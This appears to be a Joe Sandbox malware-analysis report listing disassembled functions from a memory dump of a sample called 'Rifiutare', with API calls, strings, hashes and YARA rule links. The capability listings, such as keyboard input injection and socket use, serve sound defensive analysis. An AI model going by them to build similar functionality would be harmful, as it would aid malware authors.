Instruction ID: 13f8f264af03fa1cf05d0c12931b8c8b8dfdea745305547e4661cc50796aacac
Opcode Fuzzy Hash: 42640ffdd2559c65baad024def34c4c845485c051ad6254bdc34f5463c001778
Instruction Fuzzy Hash: 522160B5600209AFEB14DF28DC95EBB37ADEB5A3A4B004059FA159B361CB30ED519B60

Function 00CA530B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CA531F
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CA5373
SetErrorMode.KERNEL32(00000000,?,?,00CCDBF4), ref: 00CA53E7

Strings

%lu, xrefs: 00CA5386

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: a0f27cd36244cf0fec291a336a560ad4c5595e2065dfee9a47676a11c2a397e9
Instruction ID: 4cc4ac25f1fabace873bdbc698ab81fb032389aad877d96bb05e3dedffb496f3
Opcode Fuzzy Hash: a0f27cd36244cf0fec291a336a560ad4c5595e2065dfee9a47676a11c2a397e9
Instruction Fuzzy Hash: C2317375600109AFDB10DF64C885EAEB7F8EF05308F1480A8F509DB262D771EE46DB61

Function 00CC48C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CC492B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CC4940
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CC494D

Strings

msctls_trackbar32, xrefs: 00CC4902

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 2b42bdaa931ea316d61183c178f4f6dc59b251cfb2ccb4e90013ff3dc7bbc082
Instruction ID: 84c0044d3908a3548616b3c996df08a0220290570aaacaf2f137a8af024f1592
Opcode Fuzzy Hash: 2b42bdaa931ea316d61183c178f4f6dc59b251cfb2ccb4e90013ff3dc7bbc082
Instruction Fuzzy Hash: EB11C631240248BEEF115F25CC06FEB7BACEF85B64F118528FB55E61A0D671DC519B20

Function 00C9375C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Part of subcall function 00C935B2: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C935D0
Part of subcall function 00C935B2: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C935E1
Part of subcall function 00C935B2: GetCurrentThreadId.KERNEL32 ref: 00C935E8
Part of subcall function 00C935B2: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C935EF

GetFocus.USER32 ref: 00C93782

Part of subcall function 00C935F9: GetParent.USER32(00000000), ref: 00C93604

GetClassNameW.USER32(?,?,00000100), ref: 00C937CD
EnumChildWindows.USER32(?,00C93845), ref: 00C937F5

Strings

%s%d, xrefs: 00C93809

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 18483885c9bf0e7b5bc7c6d8d2626af00f129322a0784a455a88b38080dac43f
Instruction ID: 17168bfb2c677de3c1ce669689b9a231001a2295648997087f9a80cb3c9b78fc
Opcode Fuzzy Hash: 18483885c9bf0e7b5bc7c6d8d2626af00f129322a0784a455a88b38080dac43f
Instruction Fuzzy Hash: 0E1193B16002455BCF156F608C89BEE776A9F48304F044079F91A9B292DB305A46DB70

Function 00C8E53F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00C8E55E
FreeLibrary.KERNEL32 ref: 00C8E584

Strings

GetSystemWow64DirectoryW, xrefs: 00C8E558
X64, xrefs: 00C8E447

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 0fb0d5b4704ba48dbe182e49a3069e8e335388e4b0f137e4671916835148a9e8
Instruction ID: bddf8fd3973fd83afd1a5e0ae075ad45c93d956ebf539596ce4e6c0ce9d6116b
Opcode Fuzzy Hash: 0fb0d5b4704ba48dbe182e49a3069e8e335388e4b0f137e4671916835148a9e8
Instruction Fuzzy Hash: 76E02B719066219BD76273A08C48F6D22247F11B08F6C4868E907F7154FF20CE448794

Function 00C9089E Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0466c25a52e7ef0ad5cb88358c90814aa2a0740113ea92bd9a605d8cc9dce3
Instruction ID: f01dfd7440ade4b7c5899528a78eecc12c20d795aed4063932fcdd4e96eedc22
Opcode Fuzzy Hash: fc0466c25a52e7ef0ad5cb88358c90814aa2a0740113ea92bd9a605d8cc9dce3
Instruction Fuzzy Hash: AAC15C75A00216EFDB04CF98C888EAEB7B5FF48714F218598E515EB251D731EE81DB90

Function 00C642A0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C6432B
__alldvrm.LIBCMT ref: 00C6452C
__alldvrm.LIBCMT ref: 00C6454E

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
Instruction ID: 9e1834e1f89969a022efd4fff5290a59f5c99badcf58a79e288f15a32e175194
Opcode Fuzzy Hash: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
Instruction Fuzzy Hash: 75A155729043869FDB39CF28C8D2BBEBBE5EF55310F18416DE5A69B281C6348E81C750

Function 00C90C55 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E0F
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E27
CLSIDFromProgID.OLE32(?,?,00000000,00CCDC00,000000FF,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E4C
_memcmp.LIBVCRUNTIME ref: 00C90E6D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 51e7f295b4a25bfa384ab54f17105979df8f7ebff3649829e7f840344a055bba
Instruction ID: 13044a0e52e4080713382e5fdaebab4ef2ef17970a24a394112e07516865868f
Opcode Fuzzy Hash: 51e7f295b4a25bfa384ab54f17105979df8f7ebff3649829e7f840344a055bba
Instruction Fuzzy Hash: B1810771A00209EFCF04DF94C888EEEB7B9FF89315F204558E516AB250DB71AE46CB60

Function 00C717B1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C718E0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 830fa19cd12f5e417a28c1d3bec0c33df5a421509b2408fc881838af2f936502
Instruction ID: bb2e56835179cb53f23a412aef57833326872c41d5b03be262a4b56f657eaf85
Opcode Fuzzy Hash: 830fa19cd12f5e417a28c1d3bec0c33df5a421509b2408fc881838af2f936502
Instruction Fuzzy Hash: AC413B31A006006BDB356EBE8C82A6E3BA8EF46770F1D8655FD2CD71D1DA344941A363

Function 00CB231C Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00CB2343
WSAGetLastError.WSOCK32 ref: 00CB2351
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CB23D0
WSAGetLastError.WSOCK32 ref: 00CB23DA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 87b351ef466269eb5bdf74c761b332788d9252cf7aa6094d6d2435a56237696a
Instruction ID: 93b83842ca0478ef0b28ff17b30440e4a5490526eb6d6458f48a8715766b78f7
Opcode Fuzzy Hash: 87b351ef466269eb5bdf74c761b332788d9252cf7aa6094d6d2435a56237696a
Instruction Fuzzy Hash: E641BF74600200AFE720AF24C886F6A77E5AB04718F54C45CF96A9F6D3C776ED82DB90

Function 00CC68ED Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00CC6957
ScreenToClient.USER32(?,?), ref: 00CC698A
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CC69F7

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4f067f07613f5913797d90190cb1c497865c070c4da551fd0d786ede62be9307
Instruction ID: 530041142b6583216646f3dd74d4af9a250a526cbae98ded89d5ed17aaced386
Opcode Fuzzy Hash: 4f067f07613f5913797d90190cb1c497865c070c4da551fd0d786ede62be9307
Instruction Fuzzy Hash: 12511A35A00209EFCB14DF64DA84FAE7BB6EB44360F108159F965A72A0D730EE91DB50

Function 00C6B83F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176046ee51ab8276203df0bb99faeb07403464bcb5be2edef8b9f5849e7e25c6
Instruction ID: 5579369390aec4f7d80cb72ddb9c2483fda5edb95a8a4508be5cbab34c00f367
Opcode Fuzzy Hash: 176046ee51ab8276203df0bb99faeb07403464bcb5be2edef8b9f5849e7e25c6
Instruction Fuzzy Hash: E041C771A00714BFE734AF78CC81B6ABBB9EB88710F10862AF155DB2C1D7759E819790

Function 00C9B27B Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,?,?), ref: 00C9B2D0
SetKeyboardState.USER32(00000080,?,?), ref: 00C9B2EC
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00C9B35A
SendInput.USER32(00000001,?,0000001C,?,?,?), ref: 00C9B3AC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 61744842003e2ca895a4c2c3be80060d934d6ff11db4fe140d853bb0b2461c96
Instruction ID: de11d4316d4c80ebac87b5714d6f7dbb759313398a944648abdc55ffe969096a
Opcode Fuzzy Hash: 61744842003e2ca895a4c2c3be80060d934d6ff11db4fe140d853bb0b2461c96
Instruction Fuzzy Hash: D3311870940258FEEF20CA65ED0DBFEBBA5BB45310F08421AF0A5561F0CB748F819791

Function 00C9B3C0 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C9B415
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C9B431
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C9B498
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C9B4EA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2f0b9282ae25fc124096ce28769477c300bc77595c9fbf02e7d75f42e4d87377
Instruction ID: 1146044e57d1e6c79a7450fbcbd2a5311ed737bd200219568059c91278bc1ce9
Opcode Fuzzy Hash: 2f0b9282ae25fc124096ce28769477c300bc77595c9fbf02e7d75f42e4d87377
Instruction Fuzzy Hash: 9B314830940248BEFF318B65E90CBFE7BA5AF44724F08821AE4A5562D2D3748E51A7A1

Function 00C9E75E Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11

_wcslen.LIBCMT ref: 00C9E794
_wcslen.LIBCMT ref: 00C9E7AB
_wcslen.LIBCMT ref: 00C9E7D6
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C9E7E1

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 9ed10b0d8c17189696ca2844b901d429254f49ac059433c679c3acb07e8538fe
Instruction ID: 4f068ef3373500b0251d95c6e86f95394a6c7edc1e398319c4d5767e4569c430
Opcode Fuzzy Hash: 9ed10b0d8c17189696ca2844b901d429254f49ac059433c679c3acb07e8538fe
Instruction Fuzzy Hash: 1521D175D00214AFCB10EFA8C885BAEBBF9EF55351F244064EC04AB281D6709E81CBA6

Function 00CC95D1 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2

GetCursorPos.USER32(?), ref: 00CC9609
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CC961E
GetCursorPos.USER32(?), ref: 00CC9666
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00CC969C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2355bede67459c5e81bb2303e0dbb6736bda88b0c49eb69e22970fdbb4937d40
Instruction ID: f3282d3e45ca7b9d2abe060fb022db1444b82ce712b63a486bd4399f727d972c
Opcode Fuzzy Hash: 2355bede67459c5e81bb2303e0dbb6736bda88b0c49eb69e22970fdbb4937d40
Instruction Fuzzy Hash: C221BC35501118AFCB258F94CC9CFFE7BB9EB89310F0041A9F9158B2A1C3319E50EB60

Function 00CC2E5C Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00CC2EE4
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC2EFE
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC2F0C
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CC2F1A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: bb3ec6ca5dc130d8b8683abf87302c859149247c85a32375fa88ab0846871f38
Instruction ID: 2d7c0a0af4a6ef74439543a801f48d3561feeeb88c9a259affb9207ce45f7b17
Opcode Fuzzy Hash: bb3ec6ca5dc130d8b8683abf87302c859149247c85a32375fa88ab0846871f38
Instruction Fuzzy Hash: 2921C232208521AFD7149B14C845FAEBBA5FF86324F18815CF4269B2D2CB71ED82CBD0

Function 00C98111 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C99599: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?), ref: 00C995A8
Part of subcall function 00C99599: lstrcpyW.KERNEL32(00000000,?,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C995CE
Part of subcall function 00C99599: lstrcmpiW.KERNEL32(00000000,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?), ref: 00C995FF

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C9813F
lstrcpyW.KERNEL32(00000000,?,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C98165
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C981A0

Strings

cdecl, xrefs: 00C98197

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 12668dccb2f510dcfae0e78314dd38d5c132425b02e5e3f28bfee29a02298673
Instruction ID: 9d577be507d794dd930cf15ad4ce07d61ee493758a4896cc6783f6b26d566cb2
Opcode Fuzzy Hash: 12668dccb2f510dcfae0e78314dd38d5c132425b02e5e3f28bfee29a02298673
Instruction Fuzzy Hash: 9911B13A200302ABCB159F29DC49E7E77A9EF49750B54402AF902C7264EF319956D791

Function 00C62099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
